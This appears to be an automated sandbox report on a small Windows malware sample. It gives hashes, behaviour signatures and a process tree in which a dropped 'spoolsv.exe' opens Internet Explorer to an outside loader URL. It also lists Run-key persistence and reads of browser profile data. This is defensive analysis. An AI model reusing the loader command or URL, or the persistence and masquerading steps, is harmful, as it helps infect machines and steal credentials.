Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    135s
  • max time network
    132s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
  • submitted
    10/10/2023, 13:04

General

  • Target

    605e03fc3014cc84172e96b80cafae45f5f3c7775d2111f977d5f71e55da934a.exe

  • Size

    12KB

  • MD5

    187e8635f8f2e07308d965cd421d54af

  • SHA1

    5ab66a40adcb46f34dcf40ddc8aa20e19fcaab32

  • SHA256

    605e03fc3014cc84172e96b80cafae45f5f3c7775d2111f977d5f71e55da934a

  • SHA512

    fcba3736ae134a04665570c5d85a713eaefc9d9deb573b505f07890fc19f4d77183041490be5fdbca5af9735bbc34b4ce6ab2dff25326f6d48176d9c5e106c67

  • SSDEEP

    192:FmS1Xdn5wLpYXQEuS7wyEPQO0llY3Dvz0EoNH6TnF5E:JvnuVYgvYOr3boEiH0K

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 36 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\605e03fc3014cc84172e96b80cafae45f5f3c7775d2111f977d5f71e55da934a.exe
    "C:\Users\Admin\AppData\Local\Temp\605e03fc3014cc84172e96b80cafae45f5f3c7775d2111f977d5f71e55da934a.exe"
    1⤵
    • Adds Run key to start application
    • Drops file in Windows directory
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2340
    • C:\Windows\spoolsv.exe
      "C:\Windows\spoolsv.exe"
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • Drops file in Windows directory
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2596
      • C:\Program Files\Internet Explorer\iexplore.exe
        "C:\Program Files\Internet Explorer\iexplore.exe" http://onsapay.com/loader
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2652
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2652 CREDAT:275457 /prefetch:2
          4⤵
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:2636

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    fe161c22218894c51b415d3d1cb01c8f

    SHA1

    4350d5756777f1c6a02d5b0a1b000651fcdf1c3a

    SHA256

    cac6ef9732959762b47c1e41d7a13bdae992a1712eb98e16fca06496b93f0fd3

    SHA512

    5d6d162b63711ed10b3096aed4db1849429107cdab5bda960a1afe2e1739759dd63dcfe2f481cc94ec74feae4790a863880cf13905fee39f58774e839339f9d7

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    07afe614220e1dd6140a98f28355cc93

    SHA1

    179a973f0a0c8baff34123e420dff68f9fdeffe3

    SHA256

    57d56046c60beedad64626fc94e332bb512f780bc7e1e840040961924b5146ff

    SHA512

    84d523f75e5c408c3fe58f5c265dfab543dd8e8f243efe16ed8d15213a161f46b4410926d9ae2f84c64af096ad8bb9d2fe9bca741abc1147278daf777f7fbb0e

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    9e569b579b3a79cc4b929bcb125c2e92

    SHA1

    d067130b9a4b7f205de06f7401e44b1ced95d4cf

    SHA256

    195db5054eaa25a36e237e0d67112087aa6435375bdcebeedfec948e30a87c03

    SHA512

    b0248fbdd2c7225fc3e05bc23fc6c8e2fda5aeb85f30edf6af44abf147afb0258b53f4f0bfe7827a43512fb94b53af62318066b4672af1818e80e1bd6f69dbb8

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    d46bc1d191e8a4cbed763f6baf92f59e

    SHA1

    7836d420bbee70ca97430c082ca0664185cf7428

    SHA256

    9bc86bc2762811c44b0a9ccb778368a35dd56592c5add6e226c3876b537c2bf5

    SHA512

    6a85b306eb8cf2f51ae9455c44501dd79fa0c55d8d59c753b56cae338863538b88f1515731b69a9de4fd92160ad82b28017f69b246e284dbf9c6d029e0e2bbb8

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    888f95ba282cbf100c9cb0d14e462a19

    SHA1

    3ef33f655c0e22201015d6684675cac14ff84d1e

    SHA256

    93acf85c27b802684d0d963a399d52fd96d169225ed11a6024d572d12557cad1

    SHA512

    c74e45c632b2f4661b40e56c4330aae944e47f1cb37ce883f4f2391530575cf84346951b8e409053c433022c47f17e8e8103f2100eb60c690f465a37ad30d799

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    dff4d0fa2aea51c5a43eacb3be8c82aa

    SHA1

    65188e32abce9950bff0930551313978b6f82596

    SHA256

    e50ace1711e048dc45f9b2ec43ed30cb9cd2cf42e5f356aaa887cd11ea34bcdf

    SHA512

    12020483661e192e85f1a40f1d14b004cadc61b3695407026be9476b8550da6e4860ce3986792362a58cfaa408625c4497a5ef8f52615e666c3f8db7bcb3e49e

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    9d65f80186d8cc02a0a9d6afc581a5af

    SHA1

    1ccaadf70e9f3ad7db1c24668aefc60e27a816a4

    SHA256

    4e994cd2b463db65a333708ad72de30294c6a63495a1861969e8ae7e937ec6d2

    SHA512

    d7bad3ce06356f5f60d68dd8fc751ceb96fe0720080b1144695df4801f1372e1f87e4a9aff64ee2c1193713dad3d69b30dd3ffa5d20e427ef161e17d7534ef3c

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    a955b6963c5cde42cd17908ddd4cd31b

    SHA1

    55ed413e164916b83c64185a744db7ad7aff7bc1

    SHA256

    14570ee7dfe352682b48eef7f2c292224e2d6df878b16434d94783bd89c94dba

    SHA512

    7e5c101bc72c25abf3e3694a95157593eb792872f6bac5e511df978dbd813d71bffb981b046c85846f7c3cd60944910e0d39628222f13f5c92ab80221de7fdbb

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    5dbaa1759551cba46a1e8ed5cd303a7a

    SHA1

    5442e2cce4b3397daa58d03703e0f22678a2ad80

    SHA256

    e9767e212e560ae7e872f5edc5632dc780a105fd4060a6031d2e042ce2b1d260

    SHA512

    b075370b2d17a116e58c069225fa0c8142d7c1fdc5104937ba31e9da49627429224d2442c24be94d2fc374032843dd908d3d0b69eefb07c7739c14fcd317625a

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    ba763d121a2eda1d60a897ed3850fc6d

    SHA1

    e0948901e42def401a154c4c2dd9673616ae1b2a

    SHA256

    fe4bfde0e5d632bdd0221894f1f57362c8527e89db2a5c98ed66ecd25ae3ebe0

    SHA512

    be4c1119e57a563c39f8ac0ee5b14681434594910b8bc529fb65e57aeb52b440d50f55d200273904c4369d1a2354a03698844930468cb43f1a1cb00db865d933

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    47b0b9d8c8d6de87bb874e3866f6ee24

    SHA1

    2365fb543e5aa56cacf7a9eef688bb6dc1421e57

    SHA256

    1016db144f6d133565dff205b85aa3ef0236acb32a9f063efb6bf58e14eacf48

    SHA512

    68c52c8401c94b9252ef78f0b4c8726a4baa2db16d7677c2a340c47c74448399335ecc9864a5337bb8b2aaff3a815f47c6d4b51f3c1a08c5fe39d345cab11b26

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    636e460908b4331f12f827f01536dca2

    SHA1

    fb423d09ae232891b7e35cff139f6c751ee811c6

    SHA256

    c87163dcb14740cfbf025e9c2fdbcc05f5f7933625b2809d2bf14efe47757198

    SHA512

    818ca8d3b046f642968daae54992c91c88ebca174c673ca63523a04b3fc2903181a4376af8eebdd09fc2f3216d93bbc5d09e1c3ffc96fcf2dd022496db61dfa0

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    a3e38c78c2362fdc719ffdf7aa2411ff

    SHA1

    9d089eda2912a9abf4434a760f36cdda4a733e5a

    SHA256

    2461f2c809f2c3de32876b755824118cc372c5439be21ea238fc07270b0ab37b

    SHA512

    45bc9c5f21421fa51899cbc66d2d7ed16a94903dff5397b4aa911441ab87e29c632e92a61617a0c16cf4464ce6fc50aa99bd58e89800d3372f75c58f44a2b1fd

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    d06ed7888329cc8c81436cc8487e3ac2

    SHA1

    a7d90fcacc59f5e4f02c23a3de86fb18ffab4dd0

    SHA256

    d3ed1e967a415011f549f3ff70eef2228ae9fa1b4ec750745b609a2cf311fcb9

    SHA512

    c68761fbd744be8b22e527423d7c76187665fffa00610dc7862ac62b36665ff044607c1fd62b7bb19724a6c64b7fb57cec94625d74b86444f9af72690a4a955b

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    f736005ce4a1250424866e7b1b684aa0

    SHA1

    392d1f5c4401e4fc1bea4cc08288460f85d52678

    SHA256

    0d8c1d25a33b34051302cb198eb3f49b1f4be609b47d5cfaca524ec034b29957

    SHA512

    275ceb20a46ef17ee2bb286da8b9d1ab196415cb3dc7e0ec790c85d2c83f33e92297a689f51111e6a9dcd0f39339c3b293a4e6a1aae881aa228e6fa13d822cc7

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    08de68237065727605d5967b34909ca8

    SHA1

    7edb61e0ef846f99feb6a002383b9bd9ee0f1459

    SHA256

    68dcfcf0fa32da6667d94f96c8e66b413695b4208b423f177495abb6bbf4ebb6

    SHA512

    4b1595e02395b0c661a9f59941e070965b49b6c6033915ebcca01eeb6f1bdcb8fc79aa05ef4d6454787eacc8f5ca60991e3f62bda0f83461fbe5b1b21015c6cc

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    26752bb27ba5c96cc98d7a93f16c01b2

    SHA1

    8f2c9b1756177c609ffc120893cdb61a3b2e9c53

    SHA256

    e689e23447e65b83967373ba080fbf7d2511740893e67d9d3173df5803baf685

    SHA512

    6fb15990db49da4d15289de2f5963945e8284908f4d9ed4403437acf7c14defb9d7fa7e71e0e94633ab36300bf583b9e78f153039ff5ec78be4a9e40baf625e0

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    b31e0f96be41408ac4825f4a7afa9b51

    SHA1

    9f9c91ee5fca0aae3761e830236e4cef16ea7468

    SHA256

    e28203292d6201b31f3ec363f396b1d60076471fdcd9f98c080ec7497eeaac8a

    SHA512

    eb98b751d3ee42b1296c5b4ed97349858210c02f9c03c14fcd390753349922daef4ac561323323915f3ef5d3b4d9899fc6cbe6d77b994a04a13d949aa54ad520

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    203da3cf012f6c0ca048f8bb4d82551e

    SHA1

    846ee3b86efb5822aa6d88a3b071ea04403023b0

    SHA256

    155931d03a53360b4a44676d8fa9770c058e388a1c28f0830712e9b338907e7d

    SHA512

    1767db982c490fba4254e5064bd9b00c70dc81460ba5d2c7e305ffded160195a4049025eec98d4caaf52dd0814ddd3e5d8b4ef01181517f57decebef7b8fe8fa

  • C:\Users\Admin\AppData\Local\Temp\CabDFE5.tmp

    Filesize

    61KB

    MD5

    f3441b8572aae8801c04f3060b550443

    SHA1

    4ef0a35436125d6821831ef36c28ffaf196cda15

    SHA256

    6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf

    SHA512

    5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

  • C:\Users\Admin\AppData\Local\Temp\TarE0A5.tmp

    Filesize

    163KB

    MD5

    9441737383d21192400eca82fda910ec

    SHA1

    725e0d606a4fc9ba44aa8ffde65bed15e65367e4

    SHA256

    bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5

    SHA512

    7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

  • C:\Users\Admin\AppData\Local\Temp\clrPzwn0FkrBbXW.exe

    Filesize

    12KB

    MD5

    6634e6e8546a2f37948e9881c60ba969

    SHA1

    e75d9cc28425115841c0013ccd3059fb5059e1ff

    SHA256

    cd0cedc919525a38b4f4913d5709cc4869a8d6489f525f26585a864aeea57ae5

    SHA512

    8753fb351544b70e7482aa5c41b50c5cd7d4d81210a1d8a5e77ff0f4ba1e34c7a31000317d72ba5d0ee4f403701a8f1a4af8991ae2ccbbdc8cdbe7f6e109aa70

  • C:\Users\Admin\AppData\Local\Temp\clrPzwn0FkrBbXW.exe

    Filesize

    12KB

    MD5

    6634e6e8546a2f37948e9881c60ba969

    SHA1

    e75d9cc28425115841c0013ccd3059fb5059e1ff

    SHA256

    cd0cedc919525a38b4f4913d5709cc4869a8d6489f525f26585a864aeea57ae5

    SHA512

    8753fb351544b70e7482aa5c41b50c5cd7d4d81210a1d8a5e77ff0f4ba1e34c7a31000317d72ba5d0ee4f403701a8f1a4af8991ae2ccbbdc8cdbe7f6e109aa70

  • C:\Windows\spoolsv.exe

    Filesize

    12KB

    MD5

    3d75b4de2c3edf60e7b79956d9afe7bb

    SHA1

    e200151ab4f14fca54117393486a11af2a1e2e0d

    SHA256

    e8b980ce74edd835672f209d6e78afa40d2ed9b1fef606e02b17e55095d4c5e0

    SHA512

    3fd6ee7b99a568feb634cb18df71a692ecf13b73a986388cf655d2e50f4a6e0a0bb890b46b84eaa39276799bbdcf50874a5769cb1a5a99fb72390f3caba23d27

  • C:\Windows\spoolsv.exe

    Filesize

    12KB

    MD5

    3d75b4de2c3edf60e7b79956d9afe7bb

    SHA1

    e200151ab4f14fca54117393486a11af2a1e2e0d

    SHA256

    e8b980ce74edd835672f209d6e78afa40d2ed9b1fef606e02b17e55095d4c5e0

    SHA512

    3fd6ee7b99a568feb634cb18df71a692ecf13b73a986388cf655d2e50f4a6e0a0bb890b46b84eaa39276799bbdcf50874a5769cb1a5a99fb72390f3caba23d27